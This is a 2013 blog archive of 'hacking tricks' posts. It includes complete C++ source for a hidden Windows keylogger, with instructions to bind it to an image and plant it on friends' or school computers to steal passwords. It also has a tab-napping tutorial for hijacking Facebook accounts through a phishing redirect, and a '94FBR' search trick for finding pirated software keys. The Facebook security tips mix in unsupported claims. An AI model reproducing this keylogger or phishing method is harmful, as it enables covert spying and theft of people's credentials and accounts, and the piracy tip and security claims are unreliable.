Friday, 13 December 2013

DOWNLOAD GOOGLE BOOKS FOR FREE

  DOWNLOAD GOOGLE BOOKS FOR FREE

                                                 


  here is a trick to download google books for free


1. Open your Internet Explorer (Not Firefox nor Chrome). Make sure that you are the admin of your computer. Then, go to the page in books.google.com that you want to download.

2. Now, go to "C:\Documents and Settings\%your admin name%\Local Settings\Temporary Internet Files\” of your computer. Delete all of the content of that folder.

3. In your Internet Explorer, refresh the page and browse-thru the pages of the books that you want to download.

4. Refresh the "Temporary Internet Files” folder. Copy all PNG files to another folder. You can distinguish PNG Files through its icon.
These files that you have just copied are, actually, the pages of the books that you have just browsed. Put it in one folder then read with ACDSee or another photo manager software.



Done!!!!

USE GOOGLE CHROME TO CHANGE WEBSITES

                                USE GOOGLE CHROME TO CHANGE WEBSITES

                                    

How to change the look of a website using google chrome

a simple trick to change the look of a website by editing page element

So to change the look follow these simple steps

1 - Highlight some text on a page

2 - Right click and click 'Inspect Element'

3 - A new Window should dock at the
bottom of Chrome


4 - Double click the highlighted line,
change the text and press enter You can also change images, links,
backgrounds and other content this way,
even prices on websites.



DONE !!!!

Thursday, 12 December 2013

HOW TO FIND SERIAL KEYS FROM GOOGLE

                                HOW TO FIND SERIAL KEYS FROM GOOGLE
                                     

Hello guys i got many request to find the key of many softwares and so i have written this article HOW TO FIND SERIAL KEY OF ANY SOFTWARE FROM GOOGLE as you all know google is one of the best search engine and you can also use it to find serial key of any softwares

so to find the serial key just follow these steps

1) go to google.com

2) write the name of the software you want key and add 94FBR at the end
      Eg :- if you want to find key of Avast then write   " AVAST 94FBR " (without quotes)

3) search it and you will find many sites with serial keys of that softwares

DONE !!!!

HOW TO CREATE A KEYLOGGER USING VISUAL C++ ???

                   HOW TO CREATE A KEYLOGGER USING VISUAL C++ ???
                                                         
Hi friends, the most interesting part of the hacking is spying. Today i am going to introduce to the C++ Spyware code. It is going to be very fun. You can install
this spyware in your college/school or in your friend system, and get their username and passwords. This is very simple hacking trick when compared to phishing web page.

Disadvantage of Phishing Web page:
you have to upload phishing web page to web hosting. But only few website won't detect the phishing webpage.
website url is different. Easy to detect that we are hacking.

Advantage of Spyware-keylogger:
Very simple and easy method.
Victim can't detect that we are hacking.

How to create Keylogger using Visual C++?
Requirements:
Dev C++. Download it from here: http://www.bloodshed.net/
Knowledge about Visual C++(need, if you are going to develop the code).

Install dev C++ in your system and open the dev C++ compiler.
Go to File->New->Source File.
you can see a blank works space will be there in window.
now copy the below keylogger code into the blank work space.

#include <iostream>
using namespace std;
#include <windows.h>
#include <winuser.h>
int Save (int key_stroke, char *file);
void Stealth();

int main()
{
Stealth();
char i;

while (1)
{
for(i = 8; i <= 190; i++)
{
if (GetAsyncKeyState(i) == -32767)
Save (i,"LOG.txt");
}
}
system ("PAUSE");
return 0;
}

/* *********************************** */

int Save (int key_stroke, char *file)
{
if ( (key_stroke == 1) || (key_stroke == 2) )
return 0;

FILE *OUTPUT_FILE;
OUTPUT_FILE = fopen(file, "a+");

cout << key_stroke << endl;

if (key_stroke == 8)
fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]");
else if (key_stroke == 13)
fprintf(OUTPUT_FILE, "%s", "\n");
else if (key_stroke == 32)
fprintf(OUTPUT_FILE, "%s", " ");
else if (key_stroke == VK_TAB)
fprintf(OUTPUT_FILE, "%s", "[TAB]");
else if (key_stroke == VK_SHIFT)
fprintf(OUTPUT_FILE, "%s", "[SHIFT]");
else if (key_stroke == VK_CONTROL)
fprintf(OUTPUT_FILE, "%s", "[CONTROL]");
else if (key_stroke == VK_ESCAPE)
fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");
else if (key_stroke == VK_END)
fprintf(OUTPUT_FILE, "%s", "[END]");
else if (key_stroke == VK_HOME)
fprintf(OUTPUT_FILE, "%s", "[HOME]");
else if (key_stroke == VK_LEFT)
fprintf(OUTPUT_FILE, "%s", "[LEFT]");
else if (key_stroke == VK_UP)
fprintf(OUTPUT_FILE, "%s", "[UP]");
else if (key_stroke == VK_RIGHT)
fprintf(OUTPUT_FILE, "%s", "[RIGHT]");
else if (key_stroke == VK_DOWN)
fprintf(OUTPUT_FILE, "%s", "[DOWN]");
else if (key_stroke == 190 || key_stroke == 110)
fprintf(OUTPUT_FILE, "%s", ".");
else
fprintf(OUTPUT_FILE, "%s", &key_stroke);

fclose (OUTPUT_FILE);
return 0;
}

/* *********************************** */

void Stealth()
{
HWND Stealth;
AllocConsole();
Stealth = FindWindowA("ConsoleWindowClass", NULL);
ShowWindow(Stealth,0);
}

Compile the Code (Ctrl+F9)

Now execute the program by selecting Execute->Run(ctrl+F10)

now your keylogger will run in your system. whatever you type using keyboard. It will be stored in Log.txt file.
you can see the log.txt file where you save the file.

bind the exe file with image or any files and send it to your friend.
(0r)
if you have physical access to your college/school system,then copy the exe file in that system and run it.

Wednesday, 11 December 2013

TRACK YOUR FACEBOOK ACTIVITY

                                   TRACK YOUR FACEBOOK ACTIVITY

Now you can track your every facebook activity example who deleted you , who has deactivated their account an etc

For this you have to open twentyfeet and sign up using facebook or twitter.

after then you will recive a email on all your facebook activity

below is a screen shot of the site


TIPS TO SECURE YOUR FACEBOOK ACCOUNT FROM GETTING HACKED

            TIPS TO SECURE YOUR FACEBOOK ACCOUNT FROM GETTING HACKED

                                          

According to facebook 7 accounts are hacked in every second and its too much so i have written this post
Here are some awesome tips to secure your facebook account from getting hacked
                                            

1) – Enable HTTPS ?

When you bookmark the URL for Facebook or any of your other social networks, be sure to use HTTPS
instead of HTTP. This encrypts your communications.
In fact, you will have to temporarily disable this feature any time you give access to a new application.
That alone should give you confidence that you have achieved a greater level of protection.


2) – Disable Online Chat ?

All of us have witnessed Facebook scams, with the most common being the infamous chat message …
“I’m in the US and have been mugged – please send money so I can get back home.”
While I have no technical basis for this, it stands to reason that the hackers get in through the chat
service. Every time I have noticed bogus comments allegedly made by me to my Facebook friends, it is
because I had previously used the online chat.
To disable chat just click on the little wheel in the right sidebar and take yourself offline. Then close the
window and make sure is registers as chat offline.


3) – Review Permissions Granted to Third Party Apps ?


When you grant access to Facebook apps, those permissions endure long after you stop using them. Go
to this link to review your Facebook app permissions – and disable any you are no longer using.
You will probably be surprised at the long list permissions your have previously granted!


4) – Activate Text Message Notifications ?

Facebook allows you to receive text notifications whenever your account is accessed from a device
other than your primary computer or mobile device.
You simply go to Account Settings and then to Security Settings to set-up the proper notifications to
your mobile device.
First go to login approvals – then login notifications.
You can only choose email or text notifications. By choosing text notifications you not only get an
immediate notice, but you also activate both your mobile device and your primary computer as
approved access points.


5) – Maintain Public and Private Email Addresses ?

The email address you use for Facebook should be distinct from the one you use where security is more
critical – such as your online banking or Paypal account.
If your Facebook account gets hacked its embarrassing. If that is the same email used on your more
secure accounts, now that vulnerability could be costly.
Obviously, if you are selective with your email addresses and periodically change your passwords, you
minimize your chances of being hacked.
Did you know that anyone can search Facebook for an email address? For example, if you are looking a
common name such as John Smith, you only need to search with their email to find the right one.
This is handy for finding your friends on Facebook, but also useful for hackers. The safe bet is to use
distinct passwords for your public and private email addresses.
There are even more ways to protect your Facebook and other online accounts, but these 5 are the
most essential, and they are specific to Facebook, which seems to be the site that is the most
vulnerable.

6) Select 4-5 as your trusted friends

Recently facebook launched a new feature called trusted friens as if u forgot your security question you can get help from your friends. to enable this go to security settings

Tuesday, 10 December 2013

HACK FACEBOOK ACCOUNT BY TAB NAPPING

                                     HACK FACEBOOK ACCOUNT BY TAB NAPPING 


                                  

Hello friends, in this article i am gonna show you how to Hack Facebook Accounts by Tab Napping Technique.Firstly you should know that Tab Napping is a new form ofphishing that is hitting the internet now. With the conventional form of phishing, for example, you might receive an email that is supposedly from your bank, and it might ask you to login and update or confirm your account details, of course, there would be a link to your banks website in the email for you to click, which would take you to a page that looks identical to your real banks login page.



How does it works

Tab napping is more sophisticated than the phishing scams we’ve seen so far, and it no longer relies on persuading you to click on a dodgy link. Instead it targets internet users who open lots of tabs on their browser at the same time (for example, by pressing
CTRL + T).

if you have multiple tabs open and you are reading the page on your current active tab, any of the other inactive browser tabs could be replaced with a fake web page that is set up to obtain your personal data, the web page will look exactly the same as the page you opened in the tab, you probably wont even even know

it has been replaced with a fake page.
fraudsters can actually detect when a tab has been left inactive for a while, and spy on your browser history to find out which websites you regularly visit, and therefore which pages to fake.


This may surprise you, but phishers and fraudsters in general can actually detect when a tab has been left inactive for a period of time, which means they can spy on your browsing history, this tells them which websites and web pages you visit on a regularly basis, so they'll know which bank you use and which email account you use, whatever you view, they'll know about it, which means they'll know which fake pages to make to replace the real pages in your inactive tabs, you've now left yourself open to become a victim of tab napping.


NOTE: If you don't have any prior knowledge of Phishing or don't have any Fake login page yet, then check this post HOW TO HACK A FACEBOOK ACCOUNT BY PHISHING


Lets start:


1. Create an Ordinary phishing page

First of all, you need to prepare a normal traditional phisher. In this tutorial, I will assume that you already know how to create a phishing page. If you don't know how, then go through my earlier tutorial on how to make a phishing page

2. Install the Script
Download the Tab Napping script by CLICKING HERE
Open the text file containing the script with a text editor like Notepad and search use{ ctrl + f to find}  for the lines below;


http://username.site.com/fakepage.htm


Now in the above script, replace http://username.site.com/fakepage.htm with yourphishing url

Note that 10000 is the default time in milliseconds, that it will take before the victim's idle tab automatically
redirects to your phishing page.

 Therefore you can modify the idle time too..
10000 milliseconds = 10 seconds

After you have edited the script, copy and paste it into the HTML of your site or blogger site.

Thats all. If you are having any problem with this tutorial feel free to comment.